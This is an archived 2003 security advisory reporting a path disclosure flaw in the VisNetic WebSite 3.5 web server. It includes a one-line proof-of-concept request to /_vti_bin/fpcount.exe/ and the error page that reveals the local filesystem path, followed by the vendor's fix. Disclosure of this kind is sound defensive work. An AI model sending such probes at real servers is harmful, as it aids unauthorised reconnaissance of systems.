TUCoPS :: Web :: Servers :: bt540.txt

VisNetic WebSite Path Disclosure Vulnerability


Name: VisNetic WebSite Path Disclosure Vulnerability=20
Date: 2nd of July 2003=20
Software affected: VisNetic WebSite 3.5, Service release 17=20
(prior versions are vulnerable)=20
Advisory: http://www.krusesecurity.dk/advisories/vis0103.txt=20
Vendor: http://www.deerfield.com/download/visnetic_website/
Risk: Low/Medium

Vendor Description:=20

VisNetic Website, the first web server developed specifically for
Windows,=20
can use almost any development platform, and includes features that
allow=20
web developers to create powerful, flexible web sites. VisNetic WebSite=20
is a secure windows-based web server that supports multiple domains, and
allows TLS/SSL secured domains. This web server also includes support
for=20
a user database that can restrict access to content, and is immune to=20
many of the security issues that may arise with other popular web
servers.=20

Problem:=20

When requesting a certain file from the vti-bin folder from Visnetic=20
Website, a folder that doesn't exist, the error message returned will
reveal=20
the absolute local path of the web folder on the target host's
filesystem.=20

POC (simpel, eh?):
http://www.somehost.com/_vti_bin/fpcount.exe/

will return the following error=20
(including the local path of the installed webpage):=20

->

500 Server Error=20

The server encountered an error and was unable to complete your request.


Message: Empty output from CGI program c:/localpath/_vti_bin/fpcount.exe


Please contact the server administrator at postmaster@somehost.com and
inform them=20
of the time the error occured, plus anything you know of that may have
caused the error.=20

<-

As you can see, the data returned by Visnetic Website, includes
information about the=20
local filesystem, that could be misused to gain sensitive information
about the=20
configuration of the Remote host.=20

Solution:=20
The problem should, according to Visnetic, have been resolved in the
latest build of=20
VisNetic WebSite that is available on the Visnetic Website download
page.=20
This I can=B4t confirm.

The update can be downloaded from the Visnetic WebSite administration
console, support=20
tab, check for updates (at the bottom of the tab).=20

Kind regards

Peter Kruse
Kruse Security
http://www.krusesecurity.dk

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH